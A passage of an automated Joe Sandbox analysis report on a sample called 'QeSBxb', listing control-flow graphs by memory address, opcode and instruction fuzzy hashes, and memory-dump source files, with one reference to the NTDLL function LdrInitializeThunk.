                                                                                  • Instruction Fuzzy Hash: BA513870D01218CBEB15EFA9D544BEEBBB2FF99300F14856AD414BB2A4D771A885CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d3d81e1c1c1df4407aca69536dfba4503ecba8ce105ec1bdb019b5252efe8c66
                                                                                  • Instruction ID: e67e7811aa5a05057588da56c44fce331ca54b86320b6b5af72133de34b9e5d2
                                                                                  • Opcode Fuzzy Hash: d3d81e1c1c1df4407aca69536dfba4503ecba8ce105ec1bdb019b5252efe8c66
                                                                                  • Instruction Fuzzy Hash: 27518774E00218DFDB18DFAAD994A9DBBB2BF89300F24816AE815BB365DB305841CF55
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e9f45383fe244efa941e78564c2ca219f4be04d2e4f8389c57ea84772fece1c
                                                                                  • Instruction ID: 76b0016c7fe078b6c94a5b4c994efa99cf446c0ade7547f7e14bcce1320d195c
                                                                                  • Opcode Fuzzy Hash: 4e9f45383fe244efa941e78564c2ca219f4be04d2e4f8389c57ea84772fece1c
                                                                                  • Instruction Fuzzy Hash: AA512570D01218CFDB14EFA9D584BEDBBB2FB58300F24956AD025BB2A5D735A889CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d901dfbf111d28c2b1a356f406cce8ea59dfbaccf7ea52c35ccbea5240e06274
                                                                                  • Instruction ID: 776c7e70927a60f7ab9e3f989ae17f7a8e04ec25801f822de8be4d68e1bf9488
                                                                                  • Opcode Fuzzy Hash: d901dfbf111d28c2b1a356f406cce8ea59dfbaccf7ea52c35ccbea5240e06274
                                                                                  • Instruction Fuzzy Hash: 96518774E00218DFDB19DFAAD894A9DBBB2BF89300F24816AE815BB365DB305841DF54

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1121 69d992c 1122 69d99eb-69d99fc 1121->1122 1123 69d99fe 1122->1123 1124 69d9a03-69d9a0c 1122->1124 1123->1124 1126 69d97e3-69d9808 1124->1126 1127 69d9a12-69d9a25 1124->1127 1128 69d980f-69d9846 1126->1128 1129 69d980a 1126->1129 1130 69d9a2c-69d9a47 1127->1130 1131 69d9a27 1127->1131 1139 69d984d-69d987f 1128->1139 1140 69d9848 1128->1140 1129->1128 1132 69d9a4e-69d9a62 1130->1132 1133 69d9a49 1130->1133 1131->1130 1137 69d9a69-69d9a7f LdrInitializeThunk 1132->1137 1138 69d9a64 1132->1138 1133->1132 1141 69d9a81-69d9b7e 1137->1141 1138->1137 1146 69d9881-69d98a6 1139->1146 1147 69d98e3-69d98f6 1139->1147 1140->1139 1144 69d9b86-69d9b90 1141->1144 1145 69d9b80-69d9b85 1141->1145 1145->1144 1151 69d98ad-69d98db 1146->1151 1152 69d98a8 1146->1152 1149 69d98fd-69d9922 1147->1149 1150 69d98f8 1147->1150 1155 69d9924-69d9925 1149->1155 1156 69d9931-69d9969 1149->1156 1150->1149 1151->1147 1152->1151 1155->1127 1157 69d996b 1156->1157 1158 69d9970-69d99d1 call 69d9328 1156->1158 1157->1158 1164 69d99d8-69d99ea 1158->1164 1165 69d99d3 1158->1165 1164->1122 1165->1164
                                                                                  APIs
                                                                                  • LdrInitializeThunk.NTDLL(00000000), ref: 069D9A6E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3897171730.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_69d0000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e1ee1f7c4c92ed0012f00aec8940ed5ded000bd4f04a53be61f055149b39ab7f
                                                                                  • Instruction ID: 6bc7e7a4a23fbce99c20f7883373c48e917aa0a7c4b310c93905c90c2efd74b0
                                                                                  • Opcode Fuzzy Hash: e1ee1f7c4c92ed0012f00aec8940ed5ded000bd4f04a53be61f055149b39ab7f
                                                                                  • Instruction Fuzzy Hash: A2115975E002098FEB44EBE8D884AADB7B5FB88314F24C165E808E7745D7309D41CB50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1249 147aef0-147aef1 1250 147aef3-147aef5 1249->1250 1251 147aecf-147aed0 1249->1251 1252 147aed3-147aed4 1250->1252 1253 147aef7-147af40 1250->1253 1251->1252 1254 147aed6 1252->1254 1255 147ae90-147aeac 1252->1255 1264 147af53-147af5e 1253->1264 1265 147af42-147af4d 1253->1265 1258 147ae5d-147ae62 1254->1258 1259 147aed8-147aeea 1254->1259 1260 147aeae-147aeb3 1255->1260 1258->1260 1270 147af64-147afc1 1264->1270 1271 147b02f 1264->1271 1265->1264 1269 147afd6-147b028 1265->1269 1269->1271 1278 147afca-147afd3 1270->1278 1273 147b037-147b051 1271->1273 1273->1271 1281 147b053-147b059 1273->1281 1281->1273 1283 147b05b-147b074 call 1477c88 1281->1283 1288 147b076-147b083 1283->1288 1289 147b085-147b093 1283->1289 1294 147b0a3-147b0a6 1288->1294 1295 147b095-147b09f 1289->1295 1296 147b0a1 1289->1296 1295->1294 1296->1294
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 3
                                                                                  • API String ID: 0-1842515611
                                                                                  • Opcode ID: 34fb477d36f65577cb074a265d3f0a0a62fb660432ee19c6cff6e5958e61a209
                                                                                  • Instruction ID: 3f13708a7e2b0b06d5e5a820719202bfe9dc660ab070a90c59de5c5ca360c275
                                                                                  • Opcode Fuzzy Hash: 34fb477d36f65577cb074a265d3f0a0a62fb660432ee19c6cff6e5958e61a209
                                                                                  • Instruction Fuzzy Hash: 8351E6327002449FDB059B79D864AAEBBB6EFC9320F18446BE506DB3A1DE319C05C791

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1805 147e007-147e022 1807 147e024 1805->1807 1808 147e029-147e02a call 147e8e8 1805->1808 1807->1808 1809 147e030-147e08b 1808->1809 1823 147e092 1809->1823 2131 147e093 call 147f2c0 1823->2131 2132 147e093 call 147f4ac 1823->2132 1824 147e099 1825 147e0a0-147e0a7 call 147f71f 1824->1825 2134 147e0a8 call 69d0b30 1825->2134 2135 147e0a8 call 69d0b20 1825->2135 1827 147e0ae 2136 147e0af call 69d178f 1827->2136 2137 147e0af call 69d17a0 1827->2137 1828 147e0b5 2138 147e0b6 call 69d1e80 1828->2138 2139 147e0b6 call 69d1e70 1828->2139 1829 147e0bc-147e0d1 call 69d2968 1833 147e0d8 1829->1833 1834 147e0df 1833->1834 1835 147e0e6-147e0ed 1834->1835 1837 147e0f4-147e0fb 1835->1837 1839 147e102-147e110 1837->1839 1842 147e117-147e11e 1839->1842 1844 147e125 1842->1844 1845 147e12c 1844->1845 1846 147e133 1845->1846 1847 147e13a 1846->1847 1848 147e141 1847->1848 1849 147e148 1848->1849 1850 147e14f-147e156 1849->1850 1852 147e15d-147e164 1850->1852 1854 147e16b 1852->1854 1855 147e172-147e179 1854->1855 1857 147e180 1855->1857 1858 147e187 1857->1858 1859 147e18e 1858->1859 1860 147e195-147e19c 1859->1860 1862 147e1a3-147e1b1 1860->1862 1865 147e1b8 1862->1865 1866 147e1bf-147e1c6 1865->1866 1868 147e1cd-147e1d4 1866->1868 1870 147e1db-147e1e2 1868->1870 1872 147e1e9 1870->1872 1873 147e1f0 1872->1873 1874 147e1f7 1873->1874 1875 147e1fe 1874->1875 1876 147e205 1875->1876 1877 147e20c-147e213 1876->1877 1879 147e21a 1877->1879 1880 147e221-147e22f 1879->1880 1883 147e236-147e23d 1880->1883 1885 147e244 1883->1885 1886 147e24b-147e252 1885->1886 1888 147e259 1886->1888 1889 147e260 1888->1889 1890 147e267-147e275 1889->1890 1893 147e27c-147e283 1890->1893 1895 147e28a 1893->1895 1896 147e291 1895->1896 1897 147e298-147e29f 1896->1897 1899 147e2a6-147e2ad 1897->1899 1901 147e2b4-147e2bb 1899->1901 1903 147e2c2-147e2c9 1901->1903 1905 147e2d0-147e2d7 1903->1905 1907 147e2de-147e2f3 1905->1907 1911 147e2fa-147e301 1907->1911 1913 147e308 1911->1913 1914 147e30f-147e316 1913->1914 1916 147e31d-147e324 1914->1916 1918 147e32b-147e332 1916->1918 1920 147e339 1918->1920 1921 147e340 1920->1921 1922 147e347-147e34e 1921->1922 1924 147e355-147e35c 1922->1924 1926 147e363-147e36a 1924->1926 1928 147e371-147e378 1926->1928 1930 147e37f-147e386 1928->1930 1932 147e38d 1930->1932 1933 147e394 1932->1933 1934 147e39b-147e3a2 1933->1934 1936 147e3a9-147e3b7 1934->1936 1939 147e3be 1936->1939 1940 147e3c5-147e3cc 1939->1940 1942 147e3d3 1940->1942 1943 147e3da 1942->1943 1944 147e3e1 1943->1944 1945 147e3e8-147e3f6 1944->1945 1948 147e3fd-147e412 1945->1948 1952 147e419-147e420 1948->1952 1954 147e427-147e4f9 1952->1954 1985 147e500-147e507 1954->1985 1987 147e50e-147e515 1985->1987 1989 147e51c 1987->1989 1990 147e523-147e538 1989->1990 1994 147e53f 1990->1994 1995 147e546-147e60a 1994->1995 2024 147e611-147e618 1995->2024 2128 147e619 call 69dfc68 2024->2128 2129 147e619 call 69dfc5a 2024->2129 2026 147e61f 2027 147e626 2026->2027 2028 147e62d-147e63b 2027->2028 2031 147e642 2028->2031 2032 147e649-147e6d5 2031->2032 2053 147e6dc 2032->2053 2054 147e6e3-147e71b 2053->2054 2063 147e722-147e729 2054->2063 2065 147e730-147e73e 2063->2065 2068 147e745 2065->2068 2069 147e74c-147e82c 2068->2069 2102 147e833 2069->2102 2103 147e83a-147e848 2102->2103 2106 147e84f 2103->2106 2107 147e856 2106->2107 2108 147e85d-147e86b 2107->2108 2111 147e872-147e879 2108->2111 2113 147e880-147e8aa 2111->2113 2120 147e8b1-147e8c6 2113->2120 2124 147e8cd 2120->2124 2125 147e8d4 2124->2125 2126 147e8db 2125->2126 2127 147e8e2-147e8e5 2126->2127 2128->2026 2129->2026 2131->1824 2132->1824 2134->1827 2135->1827 2136->1828 2137->1828 2138->1829 2139->1829
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5462c3977414f22b6dd6dd37da7a3521bc2c567e62f31d5a2d2e43470cc3c2ab
                                                                                  • Instruction ID: f4a665357201b18c0b360a9417915b25a6b2cb60a8cb648f4e6e4bab38e1ccfb
                                                                                  • Opcode Fuzzy Hash: 5462c3977414f22b6dd6dd37da7a3521bc2c567e62f31d5a2d2e43470cc3c2ab
                                                                                  • Instruction Fuzzy Hash: C212BA358A53838FD2402F30E5FC92ABB61FB4F323704AD60E14BC5A51DB764868DA66

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2141 147e018-147e022 2142 147e024 2141->2142 2143 147e029-147e092 call 147e8e8 2141->2143 2142->2143 2466 147e093 call 147f2c0 2143->2466 2467 147e093 call 147f4ac 2143->2467 2159 147e099-147e0a7 call 147f71f 2469 147e0a8 call 69d0b30 2159->2469 2470 147e0a8 call 69d0b20 2159->2470 2162 147e0ae 2471 147e0af call 69d178f 2162->2471 2472 147e0af call 69d17a0 2162->2472 2163 147e0b5 2473 147e0b6 call 69d1e80 2163->2473 2474 147e0b6 call 69d1e70 2163->2474 2164 147e0bc-147e618 call 69d2968 2463 147e619 call 69dfc68 2164->2463 2464 147e619 call 69dfc5a 2164->2464 2361 147e61f-147e8db 2462 147e8e2-147e8e5 2361->2462 2463->2361 2464->2361 2466->2159 2467->2159 2469->2162 2470->2162 2471->2163 2472->2163 2473->2164 2474->2164
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 93e9c01e5bc84ed58afe5a3af089949d1e07ac67c3b12e363b76facdad3e1d51
                                                                                  • Instruction ID: 128bbf6ca5c14a0970f023307e1a280bf9a0c53f0f5713cee7a39743d97d7286
                                                                                  • Opcode Fuzzy Hash: 93e9c01e5bc84ed58afe5a3af089949d1e07ac67c3b12e363b76facdad3e1d51
                                                                                  • Instruction Fuzzy Hash: D612A8358A13578FD2402F30E6FC92ABB61FB5F323704AD60F10BC5A51DB764868DA66

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2476 1470c8f-1470cc0 2478 1470cc7 2476->2478 2479 1470cc2 2476->2479 2480 1470cd1-1470ce2 call 1470780 2478->2480 2479->2478 2483 1470cee-147104e call 1470780 * 13 2480->2483 2557 1471056-147105f 2483->2557 2654 1471062 call 14727f0 2557->2654 2655 1471062 call 1472790 2557->2655 2558 1471068-147108f call 1473cc0 2659 1471092 call 1474285 2558->2659 2660 1471092 call 14741a0 2558->2660 2561 1471098-14710c2 2564 14710cb-14710ce call 1475362 2561->2564 2565 14710d4-14710fe 2564->2565 2568 1471107-147110a call 147c147 2565->2568 2569 1471110-147113a 2568->2569 2572 1471143-1471146 call 147c468 2569->2572 2573 147114c-1471176 2572->2573 2576 147117f-1471182 call 147c738 2573->2576 2577 1471188-14711b2 2576->2577 2580 14711bb-14711be call 147ca08 2577->2580 2581 14711c4-14711f7 2580->2581 2584 1471203-1471209 call 147ccd8 2581->2584 2585 147120f-147124b 2584->2585 2588 1471257-147125d call 147cfa9 2585->2588 2589 1471263-147129f 2588->2589 2592 14712ab-14712b1 call 147d278 2589->2592 2593 14712b7-14713d2 2592->2593 2606 14713de-14713f0 call 1475362 2593->2606 2607 14713f6-147145c 2606->2607 2612 1471467-1471473 call 147d548 2607->2612 2613 1471479-1471485 2612->2613 2614 1471490-147149c call 147d548 2613->2614 2615 14714a2-14714ae 2614->2615 2616 14714b9-14714c5 call 147d548 2615->2616 2617 14714cb-14714d7 2616->2617 2618 14714e2-14714ee call 147d548 2617->2618 2619 14714f4-1471500 2618->2619 2620 147150b-1471517 call 147d548 2619->2620 2621 147151d-1471529 2620->2621 2622 1471534-147153a 2621->2622 2656 1471540 call 147d6d4 2622->2656 2657 1471540 call 147d548 2622->2657 2623 1471546-1471552 2624 147155d-1471569 call 147d548 2623->2624 2625 147156f-147158c 2624->2625 2627 1471597-14715a3 call 147d548 2625->2627 2628 14715a9-14715b5 2627->2628 2629 14715c0-14715cc call 147d548 2628->2629 2630 14715d2-14715de 2629->2630 2631 14715e9-14715f5 call 147d548 2630->2631 2632 14715fb-1471607 2631->2632 2633 1471612-147161e call 147d548 2632->2633 2634 1471624-1471630 2633->2634 2635 147163b-1471647 call 147d548 2634->2635 2636 147164d-1471659 2635->2636 2637 1471664-1471670 call 147d548 2636->2637 2638 1471676-1471682 2637->2638 2639 147168d-1471699 call 147d548 2638->2639 2640 147169f-14716ab 2639->2640 2641 14716b6-14716c2 call 147d548 2640->2641 2642 14716c8-14716d4 2641->2642 2643 14716df-14716eb call 147d548 2642->2643 2644 14716f1-14717aa 2643->2644 2654->2558 2655->2558 2656->2623 2657->2623 2659->2561 2660->2561
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d09668fd2af2684b8969cc5d5ff530586facea18613a2e648cf4231d70f27848
                                                                                  • Instruction ID: 5f7b4ecdc1bd2266fa8ea6a952afd5c4318cc2e236a15cffeba59113a160cf1c
                                                                                  • Opcode Fuzzy Hash: d09668fd2af2684b8969cc5d5ff530586facea18613a2e648cf4231d70f27848
                                                                                  • Instruction Fuzzy Hash: 4A52DA7490136ACFCB54EF29E994B9DBBB2FB98301F1086A9D509A7358DB706D81CF40

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f9a555a2e0a17083558d87a8522398cf6720d468a181819a8f0ad57e2e38e281
                                                                                  • Instruction ID: f3b398db5571dd1d07c8a0219072697d17c57f650538ed121eef3310408f5ef3
                                                                                  • Opcode Fuzzy Hash: f9a555a2e0a17083558d87a8522398cf6720d468a181819a8f0ad57e2e38e281
                                                                                  • Instruction Fuzzy Hash: A752DB7490136ACFCB54EF29E994B9DBBB2FB98301F1086A9D509A7358DB706D81CF40

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3310 14776f1-1477725 3311 1477b54-1477b58 3310->3311 3312 147772b-147774e 3310->3312 3313 1477b71-1477b7f 3311->3313 3314 1477b5a-1477b6e 3311->3314 3321 1477754-1477761 3312->3321 3322 14777fc-1477800 3312->3322 3319 1477b81-1477b96 3313->3319 3320 1477bf0-1477c05 3313->3320 3328 1477b9d-1477baa 3319->3328 3329 1477b98-1477b9b 3319->3329 3330 1477c07-1477c0a 3320->3330 3331 1477c0c-1477c19 3320->3331 3334 1477763-147776e 3321->3334 3335 1477770 3321->3335 3325 1477802-1477810 3322->3325 3326 1477848-1477851 3322->3326 3325->3326 3346 1477812-147782d 3325->3346 3332 1477c67 3326->3332 3333 1477857-1477861 3326->3333 3336 1477bac-1477bed 3328->3336 3329->3336 3337 1477c1b-1477c56 3330->3337 3331->3337 3340 1477c6c-1477c9c 3332->3340 3333->3311 3338 1477867-1477870 3333->3338 3341 1477772-1477774 3334->3341 3335->3341 3386 1477c5d-1477c64 3337->3386 3344 1477872-1477877 3338->3344 3345 147787f-147788b 3338->3345 3373 1477cb5-1477cbc 3340->3373 3374 1477c9e-1477cb4 3340->3374 3341->3322 3349 147777a-14777dc 3341->3349 3344->3345 3345->3340 3347 1477891-1477897 3345->3347 3367 147782f-1477839 3346->3367 3368 147783b 3346->3368 3352 1477b3e-1477b42 3347->3352 3353 147789d-14778ad 3347->3353 3398 14777e2-14777f9 3349->3398 3399 14777de 3349->3399 3352->3332 3357 1477b48-1477b4e 3352->3357 3365 14778c1-14778c3 3353->3365 3366 14778af-14778bf 3353->3366 3357->3311 3357->3338 3371 14778c6-14778cc 3365->3371 3366->3371 3372 147783d-147783f 3367->3372 3368->3372 3371->3352 3380 14778d2-14778e1 3371->3380 3372->3326 3381 1477841 3372->3381 3383 14778e7 3380->3383 3384 147798f-14779ba call 1477538 * 2 3380->3384 3381->3326 3388 14778ea-14778fb 3383->3388 3403 1477aa4-1477abe 3384->3403 3404 14779c0-14779c4 3384->3404 3388->3340 3390 1477901-1477913 3388->3390 3390->3340 3393 1477919-1477931 3390->3393 3455 1477933 call 1478055 3393->3455 3456 1477933 call 14780d8 3393->3456 3396 1477939-1477949 3396->3352 3397 147794f-1477952 3396->3397 3401 1477954-147795a 3397->3401 3402 147795c-147795f 3397->3402 3398->3322 3399->3398 3401->3402 3406 1477965-1477968 3401->3406 3402->3332 3402->3406 3403->3311 3422 1477ac4-1477ac8 3403->3422 3404->3352 3405 14779ca-14779ce 3404->3405 3409 14779f6-14779fc 3405->3409 3410 14779d0-14779dd 3405->3410 3411 1477970-1477973 3406->3411 3412 147796a-147796e 3406->3412 3414 1477a37-1477a3d 3409->3414 3415 14779fe-1477a02 3409->3415 3425 14779df-14779ea 3410->3425 3426 14779ec 3410->3426 3411->3332 3413 1477979-147797d 3411->3413 3412->3411 3412->3413 3413->3332 3420 1477983-1477989 3413->3420 3417 1477a3f-1477a43 3414->3417 3418 1477a49-1477a4f 3414->3418 3415->3414 3421 1477a04-1477a0d 3415->3421 3417->3386 3417->3418 3423 1477a51-1477a55 3418->3423 3424 1477a5b-1477a5d 3418->3424 3420->3384 3420->3388 3427 1477a0f-1477a14 3421->3427 3428 1477a1c-1477a32 3421->3428 3429 1477b04-1477b08 3422->3429 3430 1477aca-1477ad4 call 14763e0 3422->3430 3423->3352 3423->3424 3431 1477a92-1477a94 3424->3431 3432 1477a5f-1477a68 3424->3432 3433 14779ee-14779f0 3425->3433 3426->3433 3427->3428 3428->3352 3429->3386 3435 1477b0e-1477b12 3429->3435 3430->3429 3443 1477ad6-1477aeb 3430->3443 3431->3352 3440 1477a9a-1477aa1 3431->3440 3438 1477a77-1477a8d 3432->3438 3439 1477a6a-1477a6f 3432->3439 3433->3352 3433->3409 3435->3386 3441 1477b18-1477b25 3435->3441 3438->3352 3439->3438 3446 1477b27-1477b32 3441->3446 3447 1477b34 3441->3447 3443->3429 3452 1477aed-1477b02 3443->3452 3449 1477b36-1477b38 3446->3449 3447->3449 3449->3352 3449->3386 3452->3311 3452->3429 3455->3396 3456->3396
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6b04b52087ac1b79bc7e3ddd8a410ae12746bb791668e78ef9e2cd1b151f9c87
                                                                                  • Instruction ID: e56a5dbf7c59ea9857fa900694803be2633c4c0a8813bd0fd7f3fbc8a15a7e47
                                                                                  • Opcode Fuzzy Hash: 6b04b52087ac1b79bc7e3ddd8a410ae12746bb791668e78ef9e2cd1b151f9c87
                                                                                  • Instruction Fuzzy Hash: 25124930A002098FDB15CF69C988AAEBBF2FF89315F55859AE545DB361D730ED41CB50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3693 1475f38-1475f5a 3694 1475f70-1475f7b 3693->3694 3695 1475f5c-1475f60 3693->3695 3698 1476023-147604f 3694->3698 3699 1475f81-1475f83 3694->3699 3696 1475f62-1475f6e 3695->3696 3697 1475f88-1475f8f 3695->3697 3696->3694 3696->3697 3701 1475f91-1475f98 3697->3701 3702 1475faf-1475fb8 3697->3702 3705 1476056-14760ae 3698->3705 3700 147601b-1476020 3699->3700 3701->3702 3703 1475f9a-1475fa5 3701->3703 3776 1475fba call 1475f29 3702->3776 3777 1475fba call 1475f38 3702->3777 3703->3705 3706 1475fab-1475fad 3703->3706 3725 14760b0-14760b6 3705->3725 3726 14760bd-14760cf 3705->3726 3706->3700 3707 1475fc0-1475fc2 3708 1475fc4-1475fc8 3707->3708 3709 1475fca-1475fd2 3707->3709 3708->3709 3714 1475fe5-1476004 call 14769a0 3708->3714 3711 1475fd4-1475fd9 3709->3711 3712 1475fe1-1475fe3 3709->3712 3711->3712 3712->3700 3719 1476006-147600f 3714->3719 3720 1476019 3714->3720 3774 1476011 call 147aef0 3719->3774 3775 1476011 call 147afad 3719->3775 3720->3700 3722 1476017 3722->3700 3725->3726 3728 14760d5-14760d9 3726->3728 3729 1476163-1476165 3726->3729 3730 14760db-14760e7 3728->3730 3731 14760e9-14760f6 3728->3731 3772 1476167 call 1476300 3729->3772 3773 1476167 call 14762f0 3729->3773 3739 14760f8-1476102 3730->3739 3731->3739 3732 147616d-1476173 3733 1476175-147617b 3732->3733 3734 147617f-1476186 3732->3734 3737 14761e1-1476240 3733->3737 3738 147617d 3733->3738 3753 1476247-147625e 3737->3753 3738->3734 3742 1476104-1476113 3739->3742 3743 147612f-1476133 3739->3743 3751 1476115-147611c 3742->3751 3752 1476123-147612d 3742->3752 3744 1476135-147613b 3743->3744 3745 147613f-1476143 3743->3745 3748 147613d 3744->3748 3749 1476189-14761da 3744->3749 3745->3734 3750 1476145-1476149 3745->3750 3748->3734 3749->3737 3750->3753 3754 147614f-1476161 3750->3754 3751->3752 3752->3743 3754->3734 3772->3732 3773->3732 3774->3722 3775->3722 3776->3707 3777->3707
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 38087841b6f767f033717b279ed84fa8eae5c18cb4efe2cc2ee82980033d3789
                                                                                  • Instruction ID: 23f10b0ea35f1fe413d084b15d5a9e93d467979369673f660eed2c9d41214469
                                                                                  • Opcode Fuzzy Hash: 38087841b6f767f033717b279ed84fa8eae5c18cb4efe2cc2ee82980033d3789
                                                                                  • Instruction Fuzzy Hash: BF91B3307042418FEB169F68D858BAF7BB3EF89204F19855AE5468B3A1CF358C02C791
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b95a485f23a72caabfc950fc511830c6d4cd876b4b069c347ddca2f21bcaa8e5
                                                                                  • Instruction ID: 61d4b73213de48ae0debfa61c48e6dbc0bfcf6f813ef398f0772360b15af0104
                                                                                  • Opcode Fuzzy Hash: b95a485f23a72caabfc950fc511830c6d4cd876b4b069c347ddca2f21bcaa8e5
                                                                                  • Instruction Fuzzy Hash: 28819E30A00905CFEB14CF6DD484AAABBB3BF89604B56856AD509E7375DB31EC41CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2b8832025f825a9e462ae66cefdb569be784f419d0c95dd2b96c0197f8dfc606
                                                                                  • Instruction ID: 4261b475f9321ddfb52cd85d7d1240ed9d02aaba1ca35672bf25115603c3dd38
                                                                                  • Opcode Fuzzy Hash: 2b8832025f825a9e462ae66cefdb569be784f419d0c95dd2b96c0197f8dfc606
                                                                                  • Instruction Fuzzy Hash: A3714C347006068FDB15DF6CC898AAE7BE5EF99201B1544AAE906DB3B1DB70DC41CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.3882083513.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1470000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 982e458fdedbeb9c2cec54761c5b212c42b955ac927cfa80a8bb6c08d0f46cd7
                                                                                  • Instruction ID: a5700ea315f3651d72773590489d5350c6d8e6860f316e4357e4afb786afe143
                                                                                  • Opcode Fuzzy Hash: 982e458fdedbeb9c2cec54761c5b212c42b955ac927cfa80a8bb6c08d0f46cd7
                                                                                  • Instruction Fuzzy Hash: DE61E074D00318DFEB15DFA5D888BAEBBB2FF89300F608129E805AB254DB756945DF50
                                                                                  Memory Dump Source
